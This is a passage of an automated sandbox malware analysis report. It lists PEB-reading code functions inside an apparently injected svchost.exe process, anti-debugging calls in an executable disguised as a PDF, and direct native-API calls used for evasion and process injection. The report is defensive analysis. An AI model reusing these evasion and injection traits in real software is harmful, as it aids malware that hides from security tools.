            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h]9_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h]9_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AE6F2 mov eax, dword ptr fs:[00000030h]9_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B06F1 mov eax, dword ptr fs:[00000030h]9_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B06F1 mov eax, dword ptr fs:[00000030h]9_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]9_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A6C7 mov eax, dword ptr fs:[00000030h]9_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C6A6 mov eax, dword ptr fs:[00000030h]9_2_0366C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036666B0 mov eax, dword ptr fs:[00000030h]9_2_036666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03634690 mov eax, dword ptr fs:[00000030h]9_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03634690 mov eax, dword ptr fs:[00000030h]9_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366656A mov eax, dword ptr fs:[00000030h]9_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366656A mov eax, dword ptr fs:[00000030h]9_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366656A mov eax, dword ptr fs:[00000030h]9_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03638550 mov eax, dword ptr fs:[00000030h]9_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03638550 mov eax, dword ptr fs:[00000030h]9_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640535 mov eax, dword ptr fs:[00000030h]9_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640535 mov eax, dword ptr fs:[00000030h]9_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640535 mov eax, dword ptr fs:[00000030h]9_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640535 mov eax, dword ptr fs:[00000030h]9_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640535 mov eax, dword ptr fs:[00000030h]9_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640535 mov eax, dword ptr fs:[00000030h]9_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E53E mov eax, dword ptr fs:[00000030h]9_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E53E mov eax, dword ptr fs:[00000030h]9_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E53E mov eax, dword ptr fs:[00000030h]9_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E53E mov eax, dword ptr fs:[00000030h]9_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E53E mov eax, dword ptr fs:[00000030h]9_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C6500 mov eax, dword ptr fs:[00000030h]9_2_036C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704500 mov eax, dword ptr fs:[00000030h]9_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704500 mov eax, dword ptr fs:[00000030h]9_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704500 mov eax, dword ptr fs:[00000030h]9_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704500 mov eax, dword ptr fs:[00000030h]9_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704500 mov eax, dword ptr fs:[00000030h]9_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704500 mov eax, dword ptr fs:[00000030h]9_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704500 mov eax, dword ptr fs:[00000030h]9_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365E5E7 mov eax, dword ptr fs:[00000030h]9_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036325E0 mov eax, dword ptr fs:[00000030h]9_2_036325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C5ED mov eax, dword ptr fs:[00000030h]9_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366C5ED mov eax, dword ptr fs:[00000030h]9_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E5CF mov eax, dword ptr fs:[00000030h]9_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E5CF mov eax, dword ptr fs:[00000030h]9_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036365D0 mov eax, dword ptr fs:[00000030h]9_2_036365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A5D0 mov eax, dword ptr fs:[00000030h]9_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A5D0 mov eax, dword ptr fs:[00000030h]9_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B05A7 mov eax, dword ptr fs:[00000030h]9_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B05A7 mov eax, dword ptr fs:[00000030h]9_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B05A7 mov eax, dword ptr fs:[00000030h]9_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036545B1 mov eax, dword ptr fs:[00000030h]9_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036545B1 mov eax, dword ptr fs:[00000030h]9_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03632582 mov eax, dword ptr fs:[00000030h]9_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03632582 mov ecx, dword ptr fs:[00000030h]9_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03664588 mov eax, dword ptr fs:[00000030h]9_2_03664588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E59C mov eax, dword ptr fs:[00000030h]9_2_0366E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BC460 mov ecx, dword ptr fs:[00000030h]9_2_036BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365A470 mov eax, dword ptr fs:[00000030h]9_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365A470 mov eax, dword ptr fs:[00000030h]9_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365A470 mov eax, dword ptr fs:[00000030h]9_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E443 mov eax, dword ptr fs:[00000030h]9_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EA456 mov eax, dword ptr fs:[00000030h]9_2_036EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362645D mov eax, dword ptr fs:[00000030h]9_2_0362645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365245A mov eax, dword ptr fs:[00000030h]9_2_0365245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362E420 mov eax, dword ptr fs:[00000030h]9_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362E420 mov eax, dword ptr fs:[00000030h]9_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362E420 mov eax, dword ptr fs:[00000030h]9_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362C427 mov eax, dword ptr fs:[00000030h]9_2_0362C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h]9_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h]9_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h]9_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h]9_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h]9_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h]9_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B6420 mov eax, dword ptr fs:[00000030h]9_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366A430 mov eax, dword ptr fs:[00000030h]9_2_0366A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03668402 mov eax, dword ptr fs:[00000030h]9_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03668402 mov eax, dword ptr fs:[00000030h]9_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03668402 mov eax, dword ptr fs:[00000030h]9_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036304E5 mov ecx, dword ptr fs:[00000030h]9_2_036304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036364AB mov eax, dword ptr fs:[00000030h]9_2_036364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036644B0 mov ecx, dword ptr fs:[00000030h]9_2_036644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036BA4B0 mov eax, dword ptr fs:[00000030h]9_2_036BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EA49A mov eax, dword ptr fs:[00000030h]9_2_036EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362CB7E mov eax, dword ptr fs:[00000030h]9_2_0362CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E4B4B mov eax, dword ptr fs:[00000030h]9_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E4B4B mov eax, dword ptr fs:[00000030h]9_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03702B57 mov eax, dword ptr fs:[00000030h]9_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03702B57 mov eax, dword ptr fs:[00000030h]9_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03702B57 mov eax, dword ptr fs:[00000030h]9_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03702B57 mov eax, dword ptr fs:[00000030h]9_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C6B40 mov eax, dword ptr fs:[00000030h]9_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C6B40 mov eax, dword ptr fs:[00000030h]9_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FAB40 mov eax, dword ptr fs:[00000030h]9_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036D8B42 mov eax, dword ptr fs:[00000030h]9_2_036D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03628B50 mov eax, dword ptr fs:[00000030h]9_2_03628B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DEB50 mov eax, dword ptr fs:[00000030h]9_2_036DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365EB20 mov eax, dword ptr fs:[00000030h]9_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365EB20 mov eax, dword ptr fs:[00000030h]9_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F8B28 mov eax, dword ptr fs:[00000030h]9_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F8B28 mov eax, dword ptr fs:[00000030h]9_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03704B00 mov eax, dword ptr fs:[00000030h]9_2_03704B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036AEB1D mov eax, dword ptr fs:[00000030h]9_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03638BF0 mov eax, dword ptr fs:[00000030h]9_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03638BF0 mov eax, dword ptr fs:[00000030h]9_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03638BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0365EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03650BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03630BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03640BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0366CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03636A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03640A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0366CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0365EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03654A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0366CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0366AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03686ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03630AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03664AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03638AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03686AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0363EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03704A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03668A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03656962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0367096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0367096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03704940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03628918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0363A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03642840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03660854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03634859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03652835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0041F250 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7336, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: EyHLOQmzGKBL.exe PID: 2340, type: MEMORYSTR
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtMapViewOfSection: Direct from: 0x77762D1C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtCreateMutant: Direct from: 0x777635CC
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtResumeThread: Direct from: 0x777636AC
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtProtectVirtualMemory: Direct from: 0x77757B2E
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtReadFile: Direct from: 0x77762ADC
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtDelayExecution: Direct from: 0x77762DDC
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtQueryInformationProcess: Direct from: 0x77762C26
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtResumeThread: Direct from: 0x77762FBC
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtCreateUserProcess: Direct from: 0x7776371C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtSetInformationThread: Direct from: 0x777563F9
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtOpenKeyEx: Direct from: 0x77763C9C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtSetInformationThread: Direct from: 0x77762B4C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtCreateKey: Direct from: 0x77762C6C
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtQuerySystemInformation: Direct from: 0x777648CC
            Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
